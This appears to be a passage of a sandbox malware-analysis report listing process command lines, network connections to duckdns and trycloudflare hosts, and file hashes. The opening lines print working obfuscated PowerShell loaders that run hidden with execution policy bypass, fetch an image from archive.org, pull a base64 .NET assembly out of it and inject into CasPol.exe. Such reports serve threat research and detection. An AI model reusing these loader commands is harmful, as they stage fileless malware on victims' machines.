eDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgDgTrewDgTreDDgTreDgTreMDgTreDgTre4DgTreGMDgTrebQBlDgTreHIDgTreLwB4DgTreG0DgTreLgBxDgTreGkDgTredDgTreByDgTreGUDgTrecDgTreB4DgTreGUDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZQBtDgTreGIDgTreZQB0DgTreGUDgTrecwBnDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBDDgTreGEDgTrecwBQDgTreG8DgTrebDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favuses146.Aar && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg', 'https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.0008cmer/xm.qitrepxe//:sptth' , '1' , 'C:\ProgramData\' , 'embetesgar','CasPol',''))} }"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\embetesgar.vbs"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Print"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\glbdqn.vbs.txt

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dvfhxj.vbe.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
NL 23.62.61.97:443 www.bing.com tcp
US 104.16.231.132:80 flu-survival-educational-nba.trycloudflare.com tcp
US 104.16.231.132:80 flu-survival-educational-nba.trycloudflare.com tcp
US 104.16.231.132:80 flu-survival-educational-nba.trycloudflare.com tcp
GB 104.86.110.107:443 tcp
NL 23.62.61.155:443 r.bing.com tcp
NL 23.62.61.155:443 r.bing.com tcp
NL 23.62.61.155:443 r.bing.com tcp
NL 23.62.61.155:443 r.bing.com tcp
NL 23.62.61.155:443 r.bing.com tcp
NL 23.62.61.155:443 r.bing.com tcp
US 20.189.173.18:443 browser.pipe.aria.microsoft.com tcp
US 52.111.227.14:443 tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
NL 23.63.101.153:80 apps.identrust.com tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 12.202.180.114:7878 anachyyyyy.duckdns.org tcp
US 12.187.175.72:6745 welxwrm.duckdns.org tcp
US 12.187.175.72:8292 welxwrm.duckdns.org tcp
US 12.187.175.72:8520 welxwrm.duckdns.org tcp
US 12.187.175.72:9390 welxwrm.duckdns.org tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 104.16.231.132:443 flu-survival-educational-nba.trycloudflare.com tcp
US 12.187.175.72:6757 welxwrm.duckdns.org tcp
US 12.221.146.138:9402 rem8000jun.duckdns.org tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
GB 172.217.169.67:80 c.pki.goog tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 172.67.187.200:443 paste.ee tcp
AU 185.184.154.17:443 nzaria.org tcp
US 207.241.232.195:443 ia803405.us.archive.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
CA 138.197.147.223:443 expertiq.mx tcp
US 12.221.146.138:8000 rem8000jun.duckdns.org tcp
NL 178.237.33.50:80 geoplugin.net tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp
AU 185.184.154.17:443 nzaria.org tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c1c7e2f451eb3836d23007799bc21d5f
SHA1 11a25f6055210aa7f99d77346b0d4f1dc123ce79
SHA256 429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800
SHA512 2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

\??\pipe\LOCAL\crashpad_3884_QORKFFBBVTVJBGNG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6876cbd342d4d6b236f44f52c50f780f
SHA1 a215cf6a499bfb67a3266d211844ec4c82128d83
SHA256 ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e
SHA512 dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a158906c377c686e3c7d43ec1b2040a8
SHA1 1706b77932f57e60a32c96e0a9491135f3c3b963
SHA256 69340da1d509cea9db4e3f1d9d55c972d5f2ff60d21c228f9636d3033e0f7a1d
SHA512 3c5f586c178e890f488f8750ef41a3aa4fd7e86cb13a997c431f265de906ae6cd9062e193fd22104edfeafb47f4e5b632eff9223ef74d4066c57a9e34dc49f0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 33d1323dd5e161c9a05a98c42e32182d
SHA1 a910aa5a44c97864610b23d0c9d833fba44f844c
SHA256 d3e866acae6216c61d791506d7a0661bd5a8530647731cf965a0b168fac16db9
SHA512 ec623e92884479ebce8a10825195626a8f5e346e04a416d039d56381d83f45dfef7f4b6acc469d0060bcf97efeeedb340f8cce8def1d9a31f833fd55762eb8b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 155d911af6926e0833d41c3c70b51869
SHA1 562206d18d5c8079e3a1230a7974cefd198990f1
SHA256 89f589dd91bc1692eba3a11c95d554af5f4bbfffc30f3e6050f7bb3830b0f82c
SHA512 4fa3f21ede42658c701499319bd9cc723dcfdbf7f81e6b68c9aca2580772adcd2e93f540f78b302d9efbe4423e8dc43bfbcb1eda813bb5e46d08dca429ced744

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e86c9ee4012d06b0b54c580f7f14c0f
SHA1 9ed99707c7d0093b74a635e2aafba0d9fc0dd02a
SHA256 a478b181c1ba437e278307a042aa625bca23cb803c329ec2d403e05040115752
SHA512 a17d007031b0d1d1204921c2b8b70fbf156ebc52f551b0dfaf715d436d577d75d9df23a70d8010fa615446f9f0696b5b71c64daf3b508fa28132fa763e3bfcc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d841e68920fd9a54dc3fc3f15d59e006
SHA1 d0a402f93957f4129a5ed421d1ebe32416e9c9f5
SHA256 4736cd36c3dd3ec5c1308968c3bdbb9cd0d3b5f044406c7ec388e556e6f3362d
SHA512 55ae49efed32c80d9fc4954682da5a184daf4f8d26c5fa2e49a784f9dc6e598025aaa52fc2cdc51f925738c39837a7c3957932f068c53b2cdae86f3de487c104

C:\Users\Admin\Downloads\Unconfirmed 153799.crdownload

MD5 f874354373f5b80b370ea199a4c1ec0c
SHA1 b1dcc359898847ccdece6ea7457896c867f5d946
SHA256 4dbd4a03823f6fe4cbac6464c0c6a7f04a20d3cc98e2b92413fda63a9bdef5f7
SHA512 e4930efd97d950a5116defba156b1c209c88d869b6b7ec5c6784ca4412527f0e8084347e9d74aef21d26b0bf26c792d85c1258c500468f06915a7b0a2e493a54

C:\Users\Admin\Downloads\new.bat:Zone.Identifier

MD5 25650b47c33c7aa597b646106385a2a5
SHA1 e638ef41a53f79f7a7a5c8f3ac902ebc1ac223fc
SHA256 129dff8411188852490b17aedccbbd67cf19a1b9660f8fa3ca61e4bfdab4b1e2
SHA512 14c048773fe664b554d93abcc7ef6abb33d8ca552142202ffdff161ce4c259f9d42b67f304329deb99f0a913da2364d9f97c7764e67883abdb05b152b4a7aea3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a20b83ceac96ab1052af346d4d408be5
SHA1 b8c825533adcc516a36133edd3ab3602896f40db
SHA256 66ad082e2c7ab6209f1c38563780d0588143ab168afb6a9e2e5e5219510a2736
SHA512 1c12536128c0445b039243ab73bc99df926599b32f59287bf7de664eb78b1eaa252cae9f36f3d91208037f97a01252775ef4d47bdb2282e9d3edd5d1f1fa02fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5028dcd15ae2f9870f79f5fc610cb347
SHA1 1c87188dc751a53c41fa85e8dca06c2a4e20542b
SHA256 20f2a860d440b0fa516cc4e34f40d7a0577a0f85759143aae07705a7292b6580
SHA512 282882338f2a47ce28eac040fd96cb559e8f1b0daf943401f80c8ee968e70a626b085eba64423cb94b01626b3b275133a15f33d032ac3a3c5de6a47bd36b0bc3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 00a455d9d155394bfb4b52258c97c5e5
SHA1 2761d0c955353e1982a588a3df78f2744cfaa9df
SHA256 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA512 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f6c1e5b1533d2aeb694d862547cba3a0
SHA1 52fa5d028012ba3fc9f7fa611c7dcb558dd856e5
SHA256 04cb3729822400b11bca37b4177e152b9cc65e588401df4ff9b8661a2e1f19d1
SHA512 842b3fbf7d3d81a43d2f602b568b27255f8b5bedc6cb5bc088865bf559cb0ac702364f22d1d5d588811f03fad717f1d388a97901860ca4b70e17ba5088e0e60b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxkdj5hg.nqm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4836-177-0x00000218AFEA0000-0x00000218AFEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d71271ff5f4c75346d756b0af3ba8d8
SHA1 cf2effedfd5eaacb5da4e349e861dffe1c0c3919
SHA256 0bb818a959dfb09457cb26f92f13f26803e21d34eae73428cedcce5abd813e1c
SHA512 3e8086ce2c4dab8f4511ad90165777e17ef13ad888fd1feb4056712891ee9f8a8d6c2e169395f2271afd652ec12fd1e857536ca30e725dfcabc8d4a395a89457

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3838c3d8436b6da24ee9e27181542f09
SHA1 fba277e6cfef5d21a29a456ce86354c0dca8354e
SHA256 0f7f4192141cafef68b57cdc9963ffb64ed0008c890475c05d36bb7d27426840
SHA512 4e26978d56cb6757c1e0466f1df3b17ae7b66dba46f527fa8eb5c6d147485b1bf6468b9062ee11b0939262489f6e03335098d4586d69500f7bd92c84ec90fd05

C:\Users\Admin\Downloads\Unconfirmed 335134.crdownload

MD5 a4c51a56c6a7775f77fa4523a483e816
SHA1 587ec280308621693e9fad4d3c756ee52c8e8424
SHA256 0007854176e6ff9a44a52d7c8778479374a3e5744e88d6e50ac0a83ee042f0c4
SHA512 2bd7bb69c614c2c344cd2b586f0d5347b201c7ad3bb9502713ff78f68f12eeb2753240fd6ceca8751e71f67bc2696e8ee95067f47b7827965a08f5cfeaf33775

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 12ff85d31d9e76455b77e6658cb06bf0
SHA1 45788e71d4a7fe9fd70b2c0e9494174b01f385eb
SHA256 1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056
SHA512 fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

C:\Users\Admin\Downloads\startupppp.bat:Zone.Identifier

MD5 2ac3d67a8a9a6e3a4e9f8269fe1fd2f9
SHA1 bf6fabca8375b737a4529b913d8f82b0a358e288
SHA256 f51d3c2990c230f5b1b2ffff157aad899c614b41fbc9ecc8a40e7ca2f0a45b29
SHA512 eeba2b6e6b621d4b13e67153b8a1adb0f63af42cb89285931f3de7649ac62789e20ed0b99bd1844fc0da91fea2a4bf8abfa3d87f3e8a1bdce46574a8461fabfb

memory/4600-269-0x0000022EE9320000-0x0000022EE9332000-memory.dmp

memory/4600-270-0x0000022EE9180000-0x0000022EE918A000-memory.dmp

C:\Users\Admin\Downloads\DXJS.zip

MD5 db3308fdbf00de1b0b198f1d5a410c61
SHA1 e6d224b9077bc4bbb253ff5cf3c839ae42f2c98e
SHA256 6fe5d6bba7346c03ad4d1ce3e27f220aea097f35e692b7966dd4f8a6bd2731ac
SHA512 bd251c88c42c1f9734b166857a9550f9af36d55c4c5a714d3eb04233379c2aa4d518f9bf1eed64945e049c52679a256808251f33d9db2c03903e2608e90d4fc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d53a85f1eb9548fa2e827020be3f68fa
SHA1 a60c4ae88e8b17c8b789abfffe301dcb77076bb2
SHA256 333e70962719de8f9b06bbe8516db51a0c34cac198f670d5f26fcfe1778bf82d
SHA512 e0b3b70d3ad48087a01ebcb804173ce46d16bbb25de2ccb3ed41d3ee7b9c7238ac247b5577235ec97ed847f4eb81e3b5e28e0cb32bc31dcf6c8e9cbf91ecc83b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f9f21866d112c6c76e09d2af1260a97a
SHA1 9b2f2f4cf683e9db3772033e81afa1d543e3c68f
SHA256 2b3300a2ceb9dc844a791730ce9a597e10e385af898a0f9dbda180b1419f9597
SHA512 38615f9b5910cfc1b6155702d9bbf48a5641bbbf0d7c15efdba01cfd76633d4255a6a054486326582c685deef7fc27d80b3ecae36a52a27542a83967ecaa7867

C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt

MD5 cc34bcc252d8014250b2fbc0a7880ead
SHA1 89a79425e089c311137adcdcf0a11dfa9d8a4e58
SHA256 a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b
SHA512 c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\__init__.py

MD5 c3239b95575b0ad63408b8e633f9334d
SHA1 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc
SHA256 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225
SHA512 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\builtin\__main__.py

MD5 47878c074f37661118db4f3525b2b6cb
